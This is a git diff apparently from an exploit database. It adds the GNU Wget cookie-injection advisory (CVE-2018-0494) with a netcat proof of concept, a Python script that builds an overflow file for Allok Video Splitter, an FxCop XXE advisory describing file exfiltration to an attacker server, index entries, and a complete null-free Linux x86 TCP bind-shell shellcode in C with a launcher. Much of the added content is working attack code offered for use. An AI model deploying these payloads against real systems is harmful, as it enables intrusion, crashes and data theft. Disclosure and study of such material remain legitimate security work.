diff --git a/exploits/linux/local/44601.txt b/exploits/linux/local/44601.txt
new file mode 100644
index 000000000..2b56c1570
--- /dev/null
+++ b/exploits/linux/local/44601.txt
@@ -0,0 +1,125 @@
+GNU Wget Cookie Injection [CVE-2018-0494]
+=========================================
+The latest version of this advisory is available at:
+https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt
+
+
+Overview
+--------
+
+GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to
+the cookie jar file.
+
+
+Description
+-----------
+
+Normally a website should not be able to set cookies for other domains. Due to
+insufficient input validation GNU Wget can be tricked into storing arbitrary cookie
+values to the cookie jar file, bypassing this security restriction.
+
+
+Impact
+------
+
+An external attacker is able to inject arbitrary cookie values cookie jar file,
+adding new or replacing existing cookie values.
+
+
+Details
+-------
+
+The discovered vulnerability, described in more detail below, enables the attack
+described here in brief.
+
+1. The attacker controlled web site sends a specially crafted Set-Cookie -header
+ to inject a new authentication cookie for example.com, replacing the existing
+ one. In order to be successful the victim must perform a wget operation on the
+ attacker controller site, for example:
+ wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid
+2. Victim uses wget to post some secret the the api.example.com:
+ wget --load-cookies jar.txt --post-file secret.txt https://example.com/upload
+
+Since the attacker was able to replace the authentication cookie for example.com,
+the secret.txt data will be posted to attacker's account instead to that of the
+victim.
+
+
+Vulnerabilities
+---------------
+
+1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494]
+
+The cookie parsing implementation does too lax input validation when parsing the
+Set-Cookie response from the server. Consider the following malicious response:
+
+HTTP/1.1 200 OK
+Content-Length: 0
+Set-Cookie: foo="bar
+ .google.com TRUE / FALSE 1900000000 injected cookie
+ ";expires=Thursday, 01-Jan-2032 08:00:00 GMT
+
+
+When parsed by Wget and stored to a cookie jar file it will appear as:
+
+# HTTP cookie file.
+# Generated by Wget on 2018-04-27 23:28:21.
+# Edit at your own risk.
+
+127.0.0.1:7777 FALSE / FALSE 1956556800 foo "bar
+ .google.com TRUE / FALSE 1900000000 injected cookie
+ "
+
+Since the Wget cookie jar parser skips any leading spaces, the .google.com line
+will be picked up.
+
+Note: The order in which the hosts/domains are stored in the cookie jar is derived
+from the hashing function used to speed up the lookups. If an existing cookie is
+to be replaced the server hostname used to serve the Set-Cookie will need to be
+carefully chosen to result in hash entry below the targeted domain. If not done,
+the original cookie will be used instead of the injected one.
+
+
+Proof of Concept
+----------------
+
+1. Set up a minimal web server, good for 1 request:
+ $ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie:
+foo="bar\r\n\x20.google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00
+GMT\r\n\r\n' | nc -v -l 7777
+
+2. Fetch the evil url:
+ $ wget --save-cookies jar.txt http://127.0.0.1:7777/plop
+
+3. Examine the resulting cookie jar file:
+ $ cat jar.txt
+
+
+Vulnerable versions
+-------------------
+
+The following GNU Wget versions are confirmed vulnerable:
+
+- 1.7 thru 1.19.4
+
+
+Mitigation
+----------
+
+1. Upgrade to GNU Wget 1.19.5 or later, or to appropriate security updated package
+ in your distribution
+
+
+Credits
+-------
+
+The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.
+
+
+Timeline
+--------
+
+2018.04.26 discovered & reported the vulnerability
+2018.04.27 CVE-2018-0494 assigned
+2018.05.06 GNU Wget 1.19.5 released with the fix
+2018.05.06 public disclosure of the advisory
\ No newline at end of file
diff --git a/exploits/windows/dos/44605.py b/exploits/windows/dos/44605.py
new file mode 100755
index 000000000..500bf91a4
--- /dev/null
+++ b/exploits/windows/dos/44605.py
@@ -0,0 +1,23 @@
+###########################################################################################
+# Exploit Title: Allok Video Splitter 3.1.1217
+# Date: 2018-05-09
+# Exploit Author: Achilles
+# Vendor Homepage: http://www.alloksoft.com/
+# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
+# Tested on OS: Windows 7 64-bit DE
+# Steps to reproduce: Copy the contents of the file (Evil.txt)
+# and paste in the License Name field click Register and BOOM
+###########################################################################################
+
+#!/usr/bin/python
+
+buffer = "A" * 780
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/44603.txt b/exploits/windows/local/44603.txt
new file mode 100644
index 000000000..8fe66f378
--- /dev/null
+++ b/exploits/windows/local/44603.txt
@@ -0,0 +1,103 @@
+[+] Credits: hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: Apparition Security
+
+
+***Greetz: indoushka|Eduardo|Dirty0tis***
+
+
+Vendor:
+========
+www.microsoft.com
+
+
+Product:
+===========
+Microsoft Windows "FxCop" v10-12
+
+
+
+Vulnerability Type:
+===================
+XML External Entity
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+Security Issue:
+================
+FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both.
+If you have the the particular SDK in question it is probably there but needs to be installed as it was for me.
+
+
+MSRC Response:
+=============
+"Weíve determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0 as far as SDKs are concerned, with version 13.0 skipped).
+We have confirmation that the SDKs for Win8+ donít ship FxCop
+We are going to pull Win7 SDKs containing v10-v12 of FxCop. Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to run
+after an SDKís install (if even feasible) would just draw attention to the problem.
+Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected.
+
+In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability."
+
+
+Exploit/POC:
+=============
+1) python -m SimpleHTTPServer
+
+2) "POC.FxCop"
+
+
+
+
+%dtd;]>
+&send;
+
+
+3) "payload.dtd"
+
+
+">
+%all;
+
+4) Import or Open "POC.FxCop" file in FxCop
+
+
+Files get exfiltrated to attacker server.
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: March 15, 2018
+Vendor opens MSRC Case 44322?: March 16, 2018
+Vendor reproduces issue : April 6, 2018
+Vendor decides to pull all download links instead of advisory or fix : April 9, 2018
+May 9, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7496ae29e..ebeca03fd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5967,6 +5967,7 @@ id,file,description,date,author,type,platform,port
44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
+44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9704,6 +9705,8 @@ id,file,description,date,author,type,platform,port
44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
+44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
+44603,exploits/windows/local/44603.txt,"FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16474,9 +16477,9 @@ id,file,description,date,author,type,platform,port
44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple,
44596,exploits/windows/remote/44596.py,"FTPShell Client 6.7 - Buffer Overflow",2018-05-08,r4wd3r,remote,windows,
-44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
-44598,exploits/php/remote/44598.rb,"PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
-44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
+44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3b9d7e237..3dfea168b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -881,3 +881,4 @@ id,file,description,date,author,type,platform
44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
+44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44602.c b/shellcodes/linux_x86/44602.c
new file mode 100644
index 000000000..14deb8762
--- /dev/null
+++ b/shellcodes/linux_x86/44602.c
@@ -0,0 +1,88 @@
+/*
+Title: Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
+Author: Amine Kanane
+Student-ID: SLAE - 1203
+Desc: Listen for a connection on Local Port 9443 and spawn a command shell
+ This version support multiple simultaneous connections using fork().
+ Also this shellcode does not use the classic socketcall() syscall.
+Tested on: Linux/x86 - SMP Debian 4.9.30-1kali1
+Date: 7 May 2018
+Disassembly of section .text:
+08048060 <_start>:
+ 8048060: 31 c0 xor eax,eax
+ 8048062: 31 db xor ebx,ebx
+ 8048064: 31 c9 xor ecx,ecx
+ 8048066: 31 d2 xor edx,edx
+ 8048068: 66 b8 67 01 mov ax,0x167
+ 804806c: b3 02 mov bl,0x2
+ 804806e: b1 01 mov cl,0x1
+ 8048070: cd 80 int 0x80
+ 8048072: 89 c3 mov ebx,eax
+ 8048074: 66 b8 69 01 mov ax,0x169
+ 8048078: 52 push edx
+ 8048079: 66 68 24 e3 pushw 0xe324 ; <== This is where we set the port number, please note that you need to adapt the number using htons() before :)
+ 804807d: 66 6a 02 pushw 0x2
+ 8048080: 89 e1 mov ecx,esp
+ 8048082: b2 10 mov dl,0x10
+ 8048084: cd 80 int 0x80
+ 8048086: 66 b8 6b 01 mov ax,0x16b
+ 804808a: 31 c9 xor ecx,ecx
+ 804808c: cd 80 int 0x80
+0804808e :
+ 804808e: 31 d2 xor edx,edx
+ 8048090: 31 f6 xor esi,esi
+ 8048092: 66 b8 6c 01 mov ax,0x16c
+ 8048096: cd 80 int 0x80
+ 8048098: 89 c6 mov esi,eax
+ 804809a: 31 c0 xor eax,eax
+ 804809c: b0 02 mov al,0x2
+ 804809e: cd 80 int 0x80
+ 80480a0: 31 ff xor edi,edi
+ 80480a2: 39 f8 cmp eax,edi
+ 80480a4: 75 e8 jne 804808e
+ 80480a6: 31 c0 xor eax,eax
+ 80480a8: b0 06 mov al,0x6
+ 80480aa: cd 80 int 0x80
+ 80480ac: 89 f3 mov ebx,esi
+ 80480ae: b1 02 mov cl,0x2
+080480b0 :
+ 80480b0: b0 3f mov al,0x3f
+ 80480b2: cd 80 int 0x80
+ 80480b4: fe c9 dec cl
+ 80480b6: 79 f8 jns 80480b0
+ 80480b8: 31 c0 xor eax,eax
+ 80480ba: 50 push eax
+ 80480bb: 89 e2 mov edx,esp
+ 80480bd: 68 2f 2f 73 68 push 0x68732f2f
+ 80480c2: 68 2f 62 69 6e push 0x6e69622f
+ 80480c7: 89 e3 mov ebx,esp
+ 80480c9: 50 push eax
+ 80480ca: 53 push ebx
+ 80480cb: 89 e1 mov ecx,esp
+ 80480cd: b0 0b mov al,0xb
+ 80480cf: cd 80 int 0x80
+*/
+
+#include
+#include
+
+unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8"
+ "\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
+ "\x66\xb8\x69\x01\x52\x66\x68"
+ "\x24\xe3" // ==> port number = 9443; sock_ad.sin_port = htons(9443);
+ "\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66"
+ "\xb8\x6b\x01\x31\xc9\xcd\x80\x31\xd2\x31"
+ "\xf6\x66\xb8\x6c\x01\xcd\x80\x89\xc6\x31"
+ "\xc0\xb0\x02\xcd\x80\x31\xff\x39\xf8\x75"
+ "\xe8\x31\xc0\xb0\x06\xcd\x80\x89\xf3\xb1"
+ "\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31"
+ "\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68"
+ "\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
+ "\xb0\x0b\xcd\x80";
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file